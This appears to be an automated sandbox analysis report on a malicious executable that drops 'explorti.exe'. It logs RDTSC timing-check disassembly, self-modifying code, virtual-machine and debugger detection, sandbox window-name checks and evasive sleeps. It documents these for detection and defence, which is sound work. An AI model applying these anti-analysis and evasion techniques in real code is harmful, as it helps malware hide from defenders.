Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA0CCA second address: 4AA0D16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov edi, eax 0x0000000d movzx ecx, dx 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 jmp 00007F9B30E293C5h 0x00000018 pop ebp 0x00000019 pushad 0x0000001a call 00007F9B30E293BCh 0x0000001f mov ah, 97h 0x00000021 pop edi 0x00000022 push eax 0x00000023 push edx 0x00000024 mov ch, 25h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4B10EC9 second address: 4B10F13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9B3082992Fh 0x00000009 xor cx, 7FBEh 0x0000000e jmp 00007F9B30829939h 0x00000013 popfd 0x00000014 movzx ecx, bx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F9B3082992Fh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4B10F13 second address: 4B10F70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F9B30E293BBh 0x0000000b sub cl, 0000007Eh 0x0000000e jmp 00007F9B30E293C9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esp], ebp 0x0000001a jmp 00007F9B30E293BEh 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F9B30E293C7h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4B1045E second address: 4B10484 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007F9B30829932h 0x0000000f mov dword ptr [esp], ebp 0x00000012 pushad 0x00000013 mov bh, cl 0x00000015 push eax 0x00000016 push edx 0x00000017 mov ah, dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4B1025D second address: 4B10294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 mov esi, 22350FF1h 0x0000000d pushfd 0x0000000e jmp 00007F9B30E293BEh 0x00000013 xor ecx, 58D3AAC8h 0x00000019 jmp 00007F9B30E293BBh 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4B10294 second address: 4B10298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4B10298 second address: 4B1029C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4B1029C second address: 4B102A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB02CD second address: 4AB02F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F9B30E293BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB02F4 second address: 4AB0341 instructions: 0x00000000 rdtsc 0x00000002 mov si, 66B3h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007F9B30829939h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F9B3082992Eh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F9B30829937h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4B10644 second address: 4B1066B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9B30E293C5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4B1066B second address: 4B106C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov dh, cl 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F9B3082992Bh 0x00000012 push dword ptr [ebp+0Ch] 0x00000015 jmp 00007F9B30829936h 0x0000001a push dword ptr [ebp+08h] 0x0000001d jmp 00007F9B30829930h 0x00000022 push 57A775D9h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F9B3082992Ch 0x0000002e rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC0547 second address: 4AC05F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F9B30E293C2h 0x0000000f adc al, FFFFFFE8h 0x00000012 jmp 00007F9B30E293BBh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F9B30E293C6h 0x0000001f push eax 0x00000020 jmp 00007F9B30E293BBh 0x00000025 xchg eax, ebp 0x00000026 pushad 0x00000027 mov ecx, 198BB3DBh 0x0000002c push esi 0x0000002d jmp 00007F9B30E293C7h 0x00000032 pop esi 0x00000033 popad 0x00000034 mov ebp, esp 0x00000036 jmp 00007F9B30E293BFh 0x0000003b push FFFFFFFEh 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 call 00007F9B30E293C2h 0x00000045 pop esi 0x00000046 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC05F3 second address: 4AC065F instructions: 0x00000000 rdtsc 0x00000002 mov cx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 call 00007F9B30829937h 0x0000000c mov ecx, 2519D85Fh 0x00000011 pop eax 0x00000012 popad 0x00000013 push 74ED2712h 0x00000018 jmp 00007F9B30829930h 0x0000001d xor dword ptr [esp], 0392E70Ah 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F9B3082992Dh 0x0000002d or al, 00000036h 0x00000030 jmp 00007F9B30829931h 0x00000035 popfd 0x00000036 mov si, CF27h 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC065F second address: 4AC0685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 movzx eax, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push 64D7D16Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9B30E293C3h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC0685 second address: 4AC06FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30829939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 129EDC96h 0x00000010 jmp 00007F9B3082992Eh 0x00000015 mov eax, dword ptr fs:[00000000h] 0x0000001b pushad 0x0000001c call 00007F9B3082992Eh 0x00000021 call 00007F9B30829932h 0x00000026 pop eax 0x00000027 pop edi 0x00000028 mov ax, 21B7h 0x0000002c popad 0x0000002d nop 0x0000002e jmp 00007F9B3082992Ah 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov ax, 4643h 0x0000003b mov ebx, esi 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC06FB second address: 4AC0723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d call 00007F9B30E293BAh 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC0723 second address: 4AC077F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F9B3082992Bh 0x00000008 sbb ecx, 68E04B4Eh 0x0000000e jmp 00007F9B30829939h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov si, 6357h 0x0000001a popad 0x0000001b sub esp, 1Ch 0x0000001e jmp 00007F9B3082992Ah 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F9B30829937h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC077F second address: 4AC07D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F9B30E293C1h 0x0000000f xchg eax, ebx 0x00000010 jmp 00007F9B30E293BEh 0x00000015 xchg eax, esi 0x00000016 jmp 00007F9B30E293C0h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push ecx 0x00000020 pop edx 0x00000021 mov bl, ch 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC07D7 second address: 4AC0862 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30829932h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F9B30829930h 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 movzx esi, di 0x00000014 pushfd 0x00000015 jmp 00007F9B30829933h 0x0000001a jmp 00007F9B30829933h 0x0000001f popfd 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 mov eax, ebx 0x00000025 pushad 0x00000026 call 00007F9B30829931h 0x0000002b pop eax 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f popad 0x00000030 xchg eax, edi 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F9B30829938h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC0862 second address: 4AC088C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ah 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [7781B370h] 0x0000000d jmp 00007F9B30E293BFh 0x00000012 xor dword ptr [ebp-08h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ebx, 7DE52136h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC088C second address: 4AC08FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 jmp 00007F9B30829934h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor eax, ebp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F9B30829937h 0x00000016 sub ecx, 2EB71F1Eh 0x0000001c jmp 00007F9B30829939h 0x00000021 popfd 0x00000022 pushad 0x00000023 mov eax, 76CF033Dh 0x00000028 mov eax, 362D9639h 0x0000002d popad 0x0000002e popad 0x0000002f nop 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F9B3082992Bh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC08FE second address: 4AC0904 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC0904 second address: 4AC0908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC0908 second address: 4AC090C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC090C second address: 4AC0920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov si, dx 0x0000000f mov bx, F5EAh 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC0920 second address: 4AC098C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov ax, B4FDh 0x0000000f pushfd 0x00000010 jmp 00007F9B30E293BAh 0x00000015 jmp 00007F9B30E293C5h 0x0000001a popfd 0x0000001b popad 0x0000001c lea eax, dword ptr [ebp-10h] 0x0000001f jmp 00007F9B30E293BEh 0x00000024 mov dword ptr fs:[00000000h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushad 0x0000002e popad 0x0000002f jmp 00007F9B30E293C3h 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC098C second address: 4AC09B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30829939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC09B4 second address: 4AC09BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC09BA second address: 4AC09BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC09BE second address: 4AC0A18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+10h] 0x0000000e pushad 0x0000000f mov cl, 58h 0x00000011 mov dh, D4h 0x00000013 popad 0x00000014 test eax, eax 0x00000016 jmp 00007F9B30E293C2h 0x0000001b jne 00007F9BA3A886EBh 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov edi, 4F0922A0h 0x00000029 call 00007F9B30E293C9h 0x0000002e pop ecx 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC0A18 second address: 4AC0A4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B3082992Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b jmp 00007F9B30829931h 0x00000010 mov dword ptr [ebp-20h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov bx, 84DEh 0x0000001a movsx edi, si 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC0A4B second address: 4AC0A90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [esi] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movsx edi, ax 0x00000011 pushfd 0x00000012 jmp 00007F9B30E293C4h 0x00000017 and esi, 67173408h 0x0000001d jmp 00007F9B30E293BBh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC0A90 second address: 4AC0A96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC0115 second address: 4AC011B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 35AD8E second address: 35ADA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30829936h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Special instruction interceptor: First address: 14ECF0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Special instruction interceptor: First address: 303588 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Special instruction interceptor: First address: 32AAB7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Special instruction interceptor: First address: 392DB4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 1CECF0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 383588 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 3AAAB7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 412DB4 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Code function: 4_2_04B10576 rdtsc 4_2_04B10576
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1174 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1175 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1183 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7696 Thread sleep time: -46023s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7692 Thread sleep count: 1174 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7692 Thread sleep time: -2349174s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7632 Thread sleep count: 347 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7632 Thread sleep time: -10410000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7872 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7684 Thread sleep count: 1175 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7684 Thread sleep time: -2351175s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7688 Thread sleep count: 1183 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7688 Thread sleep time: -2367183s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Source: explorti.exe, explorti.exe, 00000017.00000002.3542780776.0000000000361000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 0000000B.00000002.3747242277.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWZ
Source: explorti.exe, 0000000B.00000002.3747242277.0000000000D91000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 8vZMEr8sm9.exe, 00000004.00000002.1334376476.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 0000000B.00000002.3736457960.0000000000361000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 0000000C.00000002.1373716046.0000000000361000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 0000000F.00000002.1741065931.0000000000361000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000013.00000002.2344973363.0000000000361000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000015.00000002.2943814710.0000000000361000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000017.00000002.3542780776.0000000000361000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: explorti.exe, 0000000B.00000002.3747242277.0000000000D91000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWA
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
